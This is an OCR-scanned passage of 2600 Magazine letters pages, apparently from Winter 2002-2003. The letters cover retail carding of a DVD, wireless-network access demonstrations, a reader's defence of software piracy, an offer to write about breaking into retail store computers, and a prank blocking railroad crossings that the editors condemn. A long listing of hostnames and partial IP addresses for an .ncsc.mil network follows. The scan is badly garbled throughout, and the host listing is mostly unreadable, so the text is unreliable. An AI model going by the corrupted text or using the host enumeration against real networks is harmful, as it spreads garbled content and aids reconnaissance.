as long as 1 had the cash. So I walked over to electronics and stood in line. Note that l am 14 years old and I look more like 16. I asked to huy the Spider-Man DVD (they had it behind ihe counter) and they said You have to be 17 or older with ID to be able to buy this movie." Now ihe movie is freaking rated PG-I3 and to lop it off they had the VHS sluing right on shelves near the cash registers outside electronics and by music m Page 36 Page 37 electronics. Why in the hell would [hey card me for Spider-Man ? Just another case of morons power abusing. Dime Tanaka Definitely moronic behavior, if you re not in she mood for a confrontation with the store manager, we suggest writing o polite hut firm letter to She main headquarters telling them of your unpleasant experi- ence. Oftentimes this leads to some sort of resolution. Dear 2600: l gave a speech today at PM 1 and started by show- ing people how easy it is to get on wireless lief works even those that are encrypted. I'm scuta nervous now that I'll be hauled away in a black van tonight. J just fell the need to write something in case I'm never heard from again! It's a shame tit at we must live fearing that our aca- demic works will come back to haunt us. (1 also plugged 2600 during the speech.) Todd That's right, drag us dow n with you . Thoughts On Piracy Dear 26m: 1 am an avid software pirate. Much of the software that I use is pirated because 1 am one poor bastard. However, being a software developer myself, 1 realize the importance of getting what is due for your hard work Wail a minute? Huh? How can I develop soft- ware and condone piracy? I lene s my thinking on the matter. First of ali, when I benefit in any way other than purely educational, 1 make a point ol purchasing a full copy of whatever program I'm using, i had a pi- rated version of Dreamweaver for quite awhile. When I finally started posting real web pages developed in it 1 purchased the full version \ Version 3. hut that's good enough for me right now). I also have a pirated copy of 3D Studio Max that I've had for years. The version L have is old. but I have fun with a L Will I ever use it in a professional sense 1 No, Should t pay massive amounts of money to use something that l just fart around with on occasion? I don't think so! Does Lhe developer lose out because I didn't pay for my copy? Lefs pul it this way.,, if I were forced to decide today between keeping it and paying the money, or giving it up. it‘d be no contest. I'd give it up, 1 don't need it that bad. I'd never used it in a way to justify the price. So what does the developer lose? Money that they'd never have anyway if their program were completely pirate proof? If the day comes, and I doubt it will, when I use what 1 create in IDS Max for something more than idle fun, HI pay for it. Until then, t see no loss by anyone. 1 hope others use the software I create in the same manner II269U Questions Dear 2600: Does your magazine have any competition in it', class? I'm sure you know many magazines do have competitors, however I've never seen competition lo yours. I'm not trying to suggest anything negative about your magazine. !i may took as though I am. I just enjoy this, type of leading material and I gel through your magazines pretty quickly because of that, Super-Fly There are plenty oj Internet zines out there hut we haven 7 found any other paper publications that are devoted to the hacker world. Occasionally we see an abortive attempt. They usually don't succeed for a number of reasons - they try' to get too big too fast , they get spooked by the legal threats and hate mail, or they simply realize what a commitment if really is. Wtr need a good deal more zines covering this stuff nor just here hut all around the world. Dear 2606: I just read the article on 802.1 lb ( 19:2) and it told me 99 percent of everything 1 wanted to know about 802.11b networks except for the one thing l really wanted to know. In the article it said they used a ' magmount antenna on the roof " How do i hook this up to the card - or does the card just use (he antenna through osmoses? I would love to scan the surround- ing area, but need signal strength. In a TrAnCe Many 802.11 cards have antenna jacks an them but for those that don't you're pretty much out of tuct Yon may want to ask google about your card and an- tenna jack" to see if there is a way you might add one. but its gem- rails not a reliable hookup. Even so. you’ll almost certainly need an adapter ( commonly called a pigtail") to go from your antenna s jack (probably an " N " jade look for pictures) to your card s jack (probably SMA ), Dear 2606: I was wondering why there is something strange on page 33 at the bottom of the page where it should say "Page 33?" Each time there is something different but it is never correct. QuielSIuidow We get more mail on this than on an\ other subject by far. And yet, everyone who writes in seems to knttw what page number they’re talking about even though they claim the page number information is faulty! It defies all togas Dea r 2600: f have a folder on my computer that 1 cannot open or manipulate in any way. It is Located in my CA drive and when 1 double-click it. an error message pops up that says ' This folder docs not exist. " Can you tell me what has happened 1 Phule_2k2 Your problem appears to he that you’re running Windows. Other than that, this is one we weren't able to find an immediate answer for. Well let you know what we find. Dear 2600: I was wondering if you could please tell me who is the man on the right side of cover 19:3 Also if you could please enlighten me as to what 'might'' be on the disk and roll of film. Keep up ihe gtn>d fight - bo! cause of you the ideals and principles of many have been changed. Quiet Riot Answering these questions would undoubtedly lead to more questions and the need for more an swers and a possible Semite inquiry: Let’s just say it's a pretty picture and leave it at that. Dear 2660: Maybe 1 have something wrong or have misunder- stood H R, 54b9, Why are radio stations that broad- east an EM signal to my car allowed to continue to simulcast over the Internet with no proposed legisla- tion against them? Why have the Internet radio sta- tions been singled out? Did \ miss something? ddShelby Any Interne? broadcast is affected in some way. Broadcast stations are no exception. But it sen es to prove the absurdity of the legislation as broadcast sta- tions can have as many people listening to them over the airwaves as they can get without incurring any ex- tra fees. But jot every listener on the Internet (which id ready carries a bandwidth cost for each stream), an additional fee is levied Imagine what would happen if stations were charged that fee for every listener esti- mated by the Arbitral ratings sen' ice. The most popu- lar stations would probably go broke. { Maybe it’s not such a bad idea. ) Dear 2660: I was wondering if an article about OfficeMax would be of interest. I've read the articles about Radio Shack and recently the one about Target, and l was v ondering if your magazine would he interested in an i i ide about OfficeMax, Things such as store security, breaking through [he security on the HP Custom 1 ompuler Centers/logging in as administrator, the mi ix terminals, and other related topics. 1 would be in tc than happy to submit such an article if it w r ould In of use. Please let tne know so I could gel started, thank you. (ianjaf I if we print an article about one retail outlet, natu- ■ dt\ we're interested in others. That's not a guarantee « we'll print this specific article hut the topic cer- ntdy qualifies. The general rule of thumb is that If m tm i e an article to write, just write it and send it We may not print it but at least you will have writ - i *! a which is generally a good thing to do. nr ar 2660 : f ihink that your magazine is the greatest, I read it ill du time at my local Chapters Bookstore. \ always v I n cover to cover. It's the best. I have a situation that 1 don't know what to do ii hi my neighborhood we have a fun game. We i ms on the railroad tracks to make the traffic i rn i mu come down. The winner is the one who • A the longest lineup of cars. I i i week I was sure f would win the contest. I i . i ii i busy day at 5 pm, I did everything properly. I : and came back an hour later to make sure * I bail the longest car line up of all my friends. 1 ambulance in the stuck car line. 1 feel > mtv guilty about this. What should I do? Tony 1 vi 'ii feel compelled to ask us about this is a bit puzzling. Do you think a hacker magazine is going to go any easier on you for being a complete moron than any other pan of society? Not lifaety. We’re inter- ested in how the technology works like most everyone else reading this. Bat there's a rather major difference between that curiosity and an action that puts peo- ple's lives at risk - not just people stack in traffic in ambulances bar those who decide to ignore the harri- ers after waiting for a very long time. You can t do anything about the past hut you can put a stop to this crap now and in the future be fore ir really blo ws up in your face. If that actually got through to y ou t he sure to share your enlightenment with your friends. Observations Dear 2600: A few weeks ago I ordered the DES encryption shirt alongside my subscription of your magazine and received it all without problems, i haul s for the fast service, but., the shin doesn't seem to feature a DES Encryption schematic to me! Thu day before yester- day 1 had dinner with two friends who questioned the schematic to be DES. So when I had the time yester- day night 1 read through Applied Cryptography and found out DES i* not working tins way. Although I’m definitely not a crypt analyst ! could tell something was wrong. So I searched the book for more algo- rithms and learned about the IDEA algorithm. Its schematic looks almost exactly like she one on my shirt. ITte re's only one difference: The XOR and Ad- dition signs have been switched in the explanation on the bottom of the shirt. Now I'm confused. Is this thing on purpose? In a quick search on the Internet I can't find evidence on this, so I’m still confused. Can you please help me out on this one? Freddy You’re right about the IDEA algorithm. As to the reversal, perhaps it s one of those mistakes we keep making to keep people on their toes. Dear 2666: I just found out something quite disturbing at my workplace. Pm an analyst for a major ISP in Canada and I had an interesting conversation with my friend at the abuse department. It seems that the RIAA is pressuring us to shut down customers who have been involved in tile sharing, especially on the Kazan net- work. Apparently, the volume of threats by Lite RIAA, Sony, and other organizations is around 1000+ emails per month- They are receiving detailed logs with IP addresses and the names of the tiles that have been traded (even though everyone knows it's no proof) They've installed a new script on the Radius server lo break down logs in smaller chunks so they can he searched faster. Needless to say, that is quite disturb- ing, So far. they have not shut down anyone, only sent warnings by email to the "offenders. 11 They're in the process of deciding whai to do next. I'll keep you posted, I thought you would find this interesting. Quebec It might he interesting to find out exactly how they're getting these logs in the first place . Are they perhaps running some sites of their own ? Or is your ISP monitoring what their users do? continued on page 48 Page 38 2600 Magazine " inh r 2002-2003 Page 39 r .ncsc.mil (144.51.X.X) BlueCat.lts 1 1 62 .Ml Gt-X 1 2 75- H224U .alpha 114.101 CLXC7 lOrfisF 0. tycha <3 1 6 &| CTITKS6D R324 I i alpha £14 U\ HP405O-R228U.ilphp [14.76' HP01.24 n2£ 101.25] a2fl 101.26] a2? 101.27 •326 <01.26 *29 1U1 2» 430 101.30 ■31 101.31 a3Z [101.3 2 aDbie |45.2) absanlmindad juh 2d| •ftysfl fHlSj gc :i lief all vn1 [I7B 4[ acGonJ]flft 751 advero*. (32-4GJ ill (.a 1 1 ij-i-’l..' [iSS.ZflJ *rt«nppl*27 £ rS5.27 acKtrriHJleSZ lftb bP achgrrit'pladS l 05 03 ■ekerri,ppi#B4 <55 04 .,' k sir -HI .1 6:"| 105 05 JftB. 12] addhtliy 1 40 2051 Bdthfefi.fi |40 781 anva riiurn [90 2&| ■cavQcaHt.il* [182.150] HfMthFlt [129.1521 aer.pi r Qu2| ■irpiraey04 ‘03 5 1 alrpirtcyOS [ 109. 15] ai'U'r J.cydf ni4.149[ alf pIciicydY 1 09 4i ■i.lfCTOCyfia 109.941 ■Ifpir^CyOd [109.®| alrfilr^cylB 114 147] ampiiacyl 1 114,141] airpbacyti 114 1531 riifpiracyla 1P4. Idf?;' ■npiFkcyl# 1CW191 ■irpiracyl 5 1Q9 20! ■■rpiracy '.b 1 00 id air pi racy ■ 7 M4 iB2] j/rprrac.yT0 jrn f99' ■irplrtcylfli 114.1521 ■irpfrjcyM 109 7] «rprracy21 1 09 25] airp.racy22 ' 09 9| aifpirxyEd ''03.2 4) iurp [5 31 alphapprr.e plphp [14 74] □Ipha-ay. alpha 1 14 90' I pO'lOjj 1155.1381 ■itltiarypLlniy J1 53 14fl1 airitiD 1 yalkmP ] 1 83. 1 47[ imbery*iruw4 I1G3.154 amtuerynllDwS |i ipae [I02.72.J asIr-n -Dn [gi 25[ aal7^iiDri26 |ft4 Sb| Liu:0Cr..:S -j |bb -36; acehiv^ fdkflsahl [65.3] II [154 132] a«v Fwarfli qu i d ] 1 54 1 33] azalra 1 1 53 119] DOI 1Q1 31 b02 IQ1 14 W3 101 35] &04 101 36 Dd& 101 3/ bdfi 1Q1 35' b07 101 19 bCW mi 40 bQ9 101 41 blO 101 42 &11 101 43 812 101 4J" 01-3 J? 01 45 b14 idi 4ft UIS 1 01 .47 &15 101.48 &17 10t. 49 pie 101 50] bl9 501, SI b20 101 62 b2i 101 53 b22 tdl 54 873 101 624 r-Di SS bZ5 tO 1 .57 L;2L EDI 5fl h27 101.69 828 10t .601 n29 101 ft! bid 1 Q 1 .62 b31 Idi .63 ft32 1 101. 64 PnErblBtaunH | <86 131] babbl?ac-jndi MH.iS&E babbl^aoundl [Iftft i..b : [34.7] bacchusi 1 1 .24 btckftn [60 38 botklin |60 36[ btnktb(uturt.nji [187 7B) badgaccallS El 65-1 M[ bshr 164,173 1 balebrtakar [<51 131 1 bairog (36 59! tmnafiteJud [I7J.712] bahOHgpr [167 125] [54 62| baramlfn4 h f&1 [177.34] oammmkatoicl M27.31] hflrflmnmtCOtlby [177 18] pBf-TnncmWfl 1 IdCk |157 37| para hum .137. 6 1 1 para hum .137. 6 1 1 b ii baiptH .a.'Dch ]25. 115( Lnr&aiifl; ciispna cLllOLt [IK 149] bariBya&SJgm |156 1&3] harieyasaigfvi&S 1 58,1 S3 biFlayaurgn 1 70 1 56. 1 70' haileynsugril 71 158,171 badByas*fgni72 ISft 177 ba rleyaaBigrr. 1 75 I S8. 1 7 5 b a rityaaaign 1 ;{- \ 80 1 7h ba Nayusaignt 77 158.«77 btrleyHsaignl 7fl jl 56. 1 76 ba rl*y asstgrtl 791156 179 darloya ssugnE [ISft. TE7] tahayitsaFgnSm [E56 2 > 6] bariayanaignd [rod 155 bJUlayassigmi f50 149^ btrl^yaasignB 156 150 pa rlayaasignEl [13fl.2H luarnaj^a |40.149[ ErtffKtaprtOJ [12 4] barnrtMjr4 [210 4] barnrckai j 4 ft, 4 31 UamEnce ]1 30 1 B 1 [ bwnartfat (154 1441 ha«y[ift4 <6j btHplalt I60.227] basil [163.1741 L'j.-ii":; .111 I 2 E07 12 basin it.i 1! ' 5 iB7 15 baslntrail 1 5 957 15 bMlntnlllQ [187 lfi basinlrain 6 ]i07 ift basin-traiffiS '87 22 baalntftltza 167.23' buainrtBl(24 107.24 frW«WiiiP5 1&7.7S b.-^inr-n ilAi " 07 baaintcalFflS 107 &3 bal9ft*lll L20 113 ball.-agllft 120.116 0*111*0139 120.139 twttrwHr T7fl Hf ba1ira«i47 128 1*2 caliree143 128.143 &pEtT**144 120.144 UntTfoal+S 123.(45 PaHree 1 46 i?6 IM ftatlToaM/ 128 14 7' ftadrBomo 126.149 britrrtKi 150 [l20. 150 pqirrefllSl 128 151 bailrealS? i?0 iS7 barf rat 36 [12?.l6 balln9»4B 41.1 29 1 Liii1lieg47 127.47] tmlUea* j1B3 0] baachc.hani [40.71] b=acft|bi'iY85 [8S 85 bMCh](rtly6B 85 65 b*aehjP'!>B7 05 67 b*achii>ilye& 85.66 &Bach|DllyG9 85.80 bsachjQ-iy70 05.70 baaehjcUiy? 1 ’05,71 twathjpdly72 05.72 b*achjo1ly73 85,73 ftoach|Dlly7S 88.75 Juui^Ki.yi.JI’uTJC .dtS-C TC : l I ICO ! ^ )27 3e| 41.1291 127.47] OMChfOiry 75 91.76 beBphjcJ|y77 85 77 !»*ch|ollv7fi 85 70 ben-:h|Dl»y7fl B5 79 beathqbhvftD [85 00 beafJ^.uDyBi 05.8 1 DaaphjHillySl 35.63' tindchpflM 1 40.1 77] bo4an-.)i ?S9 ' 37] bearguHidy 1 1 63 '.59] btanrigtbn |18S 17] baa$i 1(41182.100! btdknfift |ft4 179] botlbbna [165- 136] beeizabu& j,1 63] b« dp adman [4(1 ss| bep2ep]7 8."> is; linllfMck [40.57} belllMtt* [40.57] botprnl.ia [35 201 1 balgpir.ad-' 0 '.26 111 taelgaribdld 126.19 i ? nlgari(ifl20 12820 b*ifl«hacR.1 E26.21 belganadZS ^6 23 belganaft24 <26 24 telganad25 128.25] calyarmHOT 126 371 twigs nadfifl 526-26} tielgaria^d 126 29 DBlgdndft30 128.30 Lfciian.iiJlS 1 25 33 bu-iijar^diW 126 34 bBr^rifliia 126 35 bslganaP3? 128 37 belpanadlO i?0 39 botgartapt-Q (25 40 bdlganpd41 1:26 41 b4fgap«d4£ 128 42 beiganadA3 120 43 be4gPiiBi±44 E?ti-.44 trBlgpfiaQ45 528.45 btlganae..i6 (28.45 tcl(jdri^^47 126 47 b*lgtnad48 H20 *& belganaaSd 1 26.50 beiM-iiM :6 i 128.51 I»lgarlsd52 126 52" b*lpinadS3 128 53 EM?lg* TIB3S4 [126.54 bPi_L.ina J6-. ; 128.58 beibENiUS? 128.57 bdgariadfHR 128 50 bttgfti’iad^ 120.50 Dsl^anadBO 1 20.60 baLgaiiadOO 126.86 ba- :i=r ,u li! 1 126 01 bfl.gansd-62 120 02 twlflunades [1^6.63] bafla[riK.Dr,cin ban^anMn [165.20] baiy iiquu |1Tg 2] bttyiaquai [170 81 1 b^sHn.arnpnr nclipsfl \ 1 Q7 09] ba ywidf-rPson J&fl SMJf blgbeing. eclipse 1 1 02. 90 1 bHab=iFig brion [26 26| b^grpol ri27 2S] bigrr.aii 16. M] t'rjmamma J'S.10] b qnntobOQ 5.6] IngnabPbOl 5.5' bigoatjowa 5 fii bigriabpM 1 5 90] big-pnbiibO [5 0 1 1 bignghnbS ]5«i bigrxadii [179.2] big nag | 5,23| bigmiancJin |84.7?| bignasUc [1 5 1 129| iuffrb j56 57] blpckcal ]1 68> bltaslc-gic [40 76] bk&BCOTOl 30 [4i 130' bfiracovt I ., ! 4i m blf3ScoLirr:hngM4 [10T 144 L -.yerrli rijliG 'O' 145] > J brftakupgplash3f.i [211.30 b'aakucaplashii 2n 31 c 1 eaiucis ola -in 42 [211.32 hreqkup5[>lq*b33 211-33 b7 17ft (,. . vu reJfnfl 1 77 107-177 buvsrdir',gi76 1 07 1 ;y buyercIliHjt 79 107-1 70 buyercllftgia jiB7 la] buyeioUngiao [107.100] t'bytrdivKgiai '(97.191 i luyarellngl 02 1 97 1 buyarcilngi 83 197 1&31 l.iLlyuldlnglfrn 197 134 huyafiHinfl 1 65 197,185 buynjclingise 107 18ft yardmglBT 1 G _r - U ? ■v&rcl ngi 00 [197,106 buyurciUngi 09 [197.109' Luy nrciPng rg HUM 9] i.uyerclingiton' [197.1 00 hiiyarclingigi 19V, 191 • I.iyarcllrtg19i 107 | 32 Ehqr»l Cling Ifla 107.193 (my4rdlngl94 107.194 r . ye rcli ng 1 95 107 yflS' buy Biding 1 98 197 lot Imygrcllngise 197 ] 9a HuyuiCilng1S9 167 199 hilyvrdjngi [IB7J5] 1 'uypn r : irirj20 [107.201 I :j rfrft .VI iqj-^CM |'197i04f buyerclmgaOS [197.280] • ..yindlngiT ] 197.21 1 1 .. y* rdli^gS1 1 MB7-J11] [•..yrtroliiigiti [107 2 <2J 1 .,..icli-:p2?;i97 22| niiyB ::'ing3 F97 3 huy»*ding4 <07.4 ! m irercdnjjB 1076 1 « iyAi raling? [3 07 7 UuT«'C1lhgfl 1 07 Hr - UV irf clings 1 [T97 01 r uy*rdingfl2 ( 07 07 ■vordmflM (97,63 iiyB(difigft4 07.04 ■ uvirr«Mhg05 (07 05 ■ ry*n; Iling0fl 197,00 t4(v*rdingB7 197.07 II (ruy« rdingBS 197.00 (i.-ytrcllnuS [197,91 . oas ion 1 84 !.n | -nr Wt 6SJ iflE 101 86’ 1 1J-.1 mi 07' i-04 TDl fift] i Ofl (0t 691 • I'Fl ("1 70 mi. 71 Jinn ILJ1 7? -n 101 flt *14 101 62] , 1* 101 C3 <01 ft4 • 101 6b < Jt 'ill 86 it} INI 87 it* IDI 0fl rirn mi && 101 ,30 Iff 101 91 I/* ItM 92 - if* IDI 93 - lu ni l 94 ■ 11 101 95 < lOl 98 . 11 ml 34 [03.134 « M.uneias 83 1 35 ■ «hpfirMj i 69 03. 1 30 Mhpnnft143 63.143 -l r i "Ml145 03 14.fi •'►irin'iidl 40 93 148 ■ . nijri YJ3.81 * *rlK1l'iil0 f83 S| - nr !M *1 ir,n fF.4 9 1 tlphli. [14 Jf] CBluKv. Inlay [I ? 1» nampdr* i(4 [162.1 38J ckmps.i'e ctfXi 'i50 120] cumpE-iE-aiftl [155 i77.’» namps4e-e202 1 1 S3 254'; camps ila-f10i'i , t4 2i4! campBil* J8.34] Cii'-rjieliame |90. 1 4! capia-nvidea [133.(5] rarUonepot (04 It] cacftinAla ;13 11] GBetnbcurgOft il.Z54| nw^b o nfr n flj 72 2541 castdtMuT-i?03 [50,i5J " '.iaslabou5-eD4 115 casut-Bl 4 65 97! casLnLinuL-riSO ]6f. 129? CartiqbbiJl fnOCft 1 50 75; basEabcur sHS [04 ij naetabbut [7.34] €aa1e(Mro |"1 5 1 13S] caaitrtomer |i84.i4£| djuiiflckwr o2U 1 122.52 1 c^a-ltsdoor-Bil iflfl 32 ; caaitrtsrtmr |154 .i 43| djuiiflckwr e20 |122.62| C4sHedc-i?r-s2 1 33] cealtedoor ]B7 131] caatbrcomer ]i 54 ii 0] □airacrrtmby 1 00 07] cauldron [80 5] ccitl+en-a; alpftii [14.25] dug 1 9 1 12; EftEerv 1 .[/ciiD fg 23ftf c*m*nlmii«i (154 33} ctnwnlpand ] 154.34] EftTttrain [iSS.iea] chamip -jn Ha |10S 140] Ciftiirigeiti*?. lii ; r6£ 0S[ dichnelpiinilnfl |1SS.164| cbnnutEftip [06.103] cbanc'IPni- [64 1:34] cbarmalaon [16? i29[ cha aeirue 1158 r 39] diawitiy [158,1881 ' bhlFlyrlinjr ]4ft.46| ehipahoy [1 19 71 1 chisel ; i 7H 13i] dlbter ]155 157] cFwpiartk [45.15] Cr-rlc(on i:^wriei]43.2ft| ctilJiDnrc [32. (Ill CBlO [32.24 ] CTnchknel [5ft 43] Cllylmhip <4] deimingracp [153.20] dayonn.TlDQ [03 sgoj d Mhejig-ahnSOa [37 t Pi | dHIhp,ng.-e0G '34.254 diiThnrtft'tftl (9.253 curFbang-EijS (DC.3£ mrUnantt-eOB 45 ?5ft rUMUan.j- a04 16 30] curihanfl-ei? 93.12^! dvWrrftnp *13,09.30] clHfhar.n-eiS 90.1B5| eHmtaJawn.iunt* [24 25] driiiDdavyn tycho [3 0| cldcKarn- [0ft 7 e | bl*c7l0-r23u tycftd f3.233| coaicai |i53.2i« raw!plp# t epo*h I2S.11 1 bsalciaek. □por*’. ]2S 12| C04st;w* [104 145] c«a1h(Kik2 1 9^] r:Dg.fhbCrt!4 |0 4j cCblr.bGi.ft 1 3 6 j C&ftLrackS [6 1] Ccfifrucklft rj 1ft| crjalrack 1 1 .6.1 ij Coairadtl 2 1 2| GbalradsIB 8.13] nojiNir.lc2 [ft 1 CpalMciS [0 ^ L‘oalradi& [6.0 cobra 7ba f'62 r4.T| CIKklMT'.ali ]4ft. 34J Ur- | rg^i cokiHULtr-tJOD [10.254] cpiorlilter [07.130] CE.rner.BCf.D3u | ift? 70J cbnan.lia. ]18J 130] CBftttpt-a400 [0 33| Cnnreril qftfto |07.152| carcrept-gikO 60 R4] cEncep(-g02 [16 p.ftal mnce:. i uOO 4 0. 222 1 Cpnc*p|.0O4 103 2541 cpncopl nOS 101 15E' CDnca^l-alO 139 97L tancapr-ell 123£5^| concep(-el2 127,3&4| cuncep|,&13 139.85] e*no*p1-e14 [so. 120] concepl-eiCi [65 33[ CETicepl-e 2 1 [0fl.&ft5 cgncupf uii p ftf <6 f " ccmc«?l-a23 60.65| Cunrfu:.| 4 7. 254 1 Ooncept-aSS flfl.65J enncapt-f 100ft ISO. 128] pancepJ ITO10 /fl6.93| cerng [107 136 e09 r 1 C* 1 <37 a 1 0 [ 1 01 . 1 35 all f 1 01 .130 *12 [101 140 *13 iftl I4i #14 '01 14? #t5 rOI 1431 E L 5 [<01 144 *17 101 145 0 re Tftl 146 m9, Iftl 147 G2Q Iftl 14ft ti-21 JlOl 149 P?2 iftl 150 c23 I0J.J51 □24 101.152 eZ5 '101.(53 fL!S 101 1G4 ■27 101 155 *2S 101 i5fc e£L< IDI IC,7 #30 (01 IMj ouithoirrfi4 187] nmjlperl 145.17] tcl-ipB® [102.80] edqe&erver arinnK [£4.ioj DllorTiaae 1 1 27 42j eJedioriktaE IfiB. 1 39] plfljnu [34 ,JJ elroy Ita [162 9] Bfu&iae [84 37| efysrum [32 It orrib 1 ar *Bbla J i 54.2] fl-rntrnlOgroe h [84 .63] emeraloElprin 1 141 30] a.Tipi're. ecirpEe | t OS t 33\ ancarnp [1 2 2M] andUnt [07.67] iFnaor.umpro.flOlpae [102 1 4ft) emd.lts M82S21 isr.igma |40 i3n'| eni^rpriBB (Is [1E2 247] ori4ol[s[l62.133] iiqualol fla [162. 281 MCJjpdrftm [70.2O( eHCfloagamBT Tfi^ZI] #HCsp 0 fimii [78 251 Mtapapam [78 £3| Mcapef on \ In 241 eacapelp |7-'i 35] aanapewild 176 2S| ainmily [i.is| fliuncap [B3.37] oEon bama 36R yaj evenkbel [40 1 70] ayerlanmg He [162.41J asbrnsneyoulh [40 58 1 tSittifigspacH ['es.lf ' OK I nEtflvIBw [84 93] aya*ha*rk l&4 4] 101 [107 1671 101- 1 .101 1561 I0E [10P 162 133 J 101. ISO (04 [f01 704 1051101 TftS roe ; i Oi me '07 j 1 0 1 107 106 [IDI 180 [D0)1O1 130 1 >0 101 I jfQl tn 101 171 r>? 101,172' M3 IDT 173 114 [Iftl 1/4 ns mi 17 & (16 101 I 76 117 101 177 Sift 101 170 ilfl [t 0 1 170 150 iftl iftl i ril [101 161 [EE lOI 1B2 (£3 [101 1fi3 rM [101 134 !£5 fitir J05. 128 r&l '08 137 I0| <07 128 tftl 500 129 (01 SftS fDO.roi r&0 T31 101 191 732 101 192 fab-ricftpac*141 1 165. 141 1 fadticr-pncsE [105 105] rahrius.ee re3 i&5 1.14 lahr^s45Bce4 I 05 ?0& lebncspacaS t65 2i0 [aPfeuu*r.#poch [2S.1DI leirwuurhn r 1 94 07.194 leirWflsfch*rl95 07 196 fqirweaimar (9B ft7 i£k0 rHmviaaiH4:r197 67.107 rairn*n!H*M90 [67. toe! lalcr;.-, timp'rn eclipse 1102 i43[ innnllc 1 1 53] Santdiy 190 351 isle nr. 1162.39] lal® |32 2i[ '.iiem#f33 g,i | ftulnerwe.gfn [04 sft| fiddler [75 14f hgurBcts1*r [-03 22] (ig^roslona [84 84] rindblmk [40.85] fir* i32.45J l.rgl TOO 1] Ilian 90. 1 1 L '■nsi B 90.18] I'rnZO 104.67] lirgZO 90 30] rifB200 1103.200] Nrejl [90.211 rife? 1ft 1 1 03.2101 f|re30 194 5 I f Firerfl '194 5fl| i'ra4? 90,42] lira# 3 [flQ,4.£! Irr*44 104.6§] I, |Q45 104.351 i rn-IB 00 46 f|re47 00 47 0£e4a 90 4« flM"t9 90. 4-9 N)P51 , 194 851 fire52 1 94.04 'i t '7*52 90. 5? fire 53 [90 .S3 iirif*,# [90.54 fin>56 194S8| (irtS 7 [SO 1 8 fireSB [00. 57 liraSft 90 5ft llaft.ectlpse 1 0E 70] ilathwanp-nghl fl&£ 1 34 j i|#E.h*lflrp-epqK* [103.130] ilaEhwarp-s,poBd [162 FDft'i Ildahwgtp.Fler [1B3.120J natinl [173.1] rinvhniG 1 73 24 bavltm {T73 2S uavinlS ri73Ee ilevmlft f 73.27 (Ikvmiai . 174 131 1 Hd-YIPi 1 34 [l74 1J&I Havinll 174 t33j HaYinlS [i 74 'D2| ftdvfjilt |r73. T01 (lavidi 173.2] FlflYlBS 173.17 [JflYlet <70.10 HflVin5 173.10 rieuimfi , 1 73 £□ H*Yln7 [1 7$.2l flavimB [173,23] llaYirrB | I7 i £3| rr*#b*(h [TS5.I47! MeacciilBr [155 140] rio*ti3rid0fi [oe.20] bores [84 1 00! Norm |6n 175] Jaicttll* liBHAZ} loidqnrd M90. m6| loHovat [100 135| iQidpair (100 r37] Ifjldpnu 1 94 .44 j 1..i!r-n1mld ec [79.34' Farscnurl [64 13[ I n Thews I1 1 J210. M | rnr(Jew#M2 [213-121 TcFrt|BW#Jta 213 1?| fglfur 1 1 95 101 (oxpirr |158 112] lieedDfri |64 1 36 1 Ireedomi [04.130] Keepeut.lt a [l62-6 t( Sr#*5psce1 35 £0.135 frfik?SDei;t‘ : 45 |0 14ft freeapacfi 1 4fi [0 l*flj rraenpeeg^g (87 105 frklEy 1 1 771 [rMr'ir [1.7fl| fr-ChjL? [ js.54f Kogleg olnhti |14 >a| ircntier li 5 [|S£ 122] KbCiller 190 26] K»tbr1a [170.93] ?? r-Etfelf ifid 92] freely M7&.5) rruit&ai iea 191 fumai.rg'i nafiez ft] Turblnncl |205 1| furfclanqtz 205 I? lurDtantiS E05 IS lurbtancie 205.18 lufLi ,i iftg 1 7 ZD5 1? IprbtRnclO L'05 16 lurbrg^Gl 9 [205. Ifl furolancft 305 fl] furblanufl r?05 58. leg] llACrtWirlO 155.174] !uubseri1 156.175S luobsftft? 155 176] lu77D0nr 14 I05t7a1 lijjT^tseri 1 155 168] ru47n#nr209 [155.209] fuzzbnrSIO '155.2101 luzzb«ar?ii 105 211! 1u77tHi*r2i2 1&0.212I luizbagjilO 155.213] 9u£ZtM*F3 j 5 5. 1 6 7 tuzztwa/4 ;t ‘’'5.'fefr fuiitearS 1 55 tft& 1 u /z Dt ■ if E- 1SS 170 hjj-jUftfir? 1 155.1 71 FuzzbtarB [ 1 55 1 7£ ruzzfeaffi 1.85. 1 73, I’jzzyfevHr 145 [37.145 luzzy'averKG 37 1 46 iuzzyfiwerl47 37 147 lurrylovarKB [37 i4ft Suzzy'aver149 37 i4ft : fuzzy Isutr 150 37. iso lujzyleverl 51 '37.551 lnrvylpuerl 52 [07.152 luzzyteverlSO .07. i&ft fuzzvlBveM 55 37 155 luzzyffiysriefi 37 158 iuzzyraveNS? r 3? 157 iuzzyriiYeFiss :37 i&e ■uzzyrsveMSB 37 150 (uzzyfg^er 1 SO 37. 1 OD' fuzzy favs' ffti [37.56f, luzjylaver162 37 16?! W inter 2002-2003 Page 41 'is | T 6i (T L 1*5 i 1 q.inmnumrerill [IfiS 1 40] gairancmron 1 2 |i 67 1] gammarwronZ ! 165.9] gandalE35.a3j g»rd*-fihaLSam2 |16'3.t3fi| gwttirick | f 03 51 gaulish [92.46; geheena [55.12] ■■ftivnii aclrpae ] 155. 1 1 D) g«[ii!gg alpha j 14.55] CjiBGngn |34 4] ghost 1 1 .62] ghauli [127.35] yiluty [64.51] nl*ei*r [T 53.20] glodsTflim |32 3*J gnapimap | »9* 35[ gnaiipenny 151 ’ 6 i ijlisEfia v : 62 [09.162 puJpMmyite [09 163 ^nalpe*inyl6^ [69 Ifri gnaSpsnnylfiS [09.115E gnaipEnriylSfl 89,166 yriB Iponny 1 67 |S9. 167 Qnalpanny 1 6® ?S9. 1 00' gn nlmnnv 1 8$ fl9 i&9 gn atpBnny 1 70 fii? 1 70 gnalpannylTl 89.171 gnA^tnny 1 72 {£9. 1 72 grip penny 174 £0 174 gmatpennyl ?5 B9-175 gnslpenn-yi 78 89.176 grtatpan^y 1 7g . B0. 1 79 grtUEpon rty 1 SI 59 10! gnn! penny ! 0? 09 1 02 gf,atp0nn,ylfl3 60 187 goatEiua [54 .5' 90l(tli'Mi» [65 .3] yjlluni [30 00] iJPGSOP' mpta |ft4 12] gothic [32 47] 4)o;oEurure.Ms [102.271 grant [ 10.1 01 J praps, eiehara [71.103] gravadfltbw [1S4.3] □raveaO[i0 gretjrky [a 1 02] gr^fcle^idSE. epoch |25 150| grilunaekl 164.14?] grilmasklQ ifi* 67 [ gmmaakZ 4fi giiUnfiSkD 64 144 grilirtflik* [04.1*5 gritFnaifcE [6* 146 gritmEaftfi 54 1 £9 gnlmaak? 54.1 60 ' grtimaskB 64 161- grtHnaskB [64.162] grc ladvcrton [26 1Q2| groroet ( 1 40; 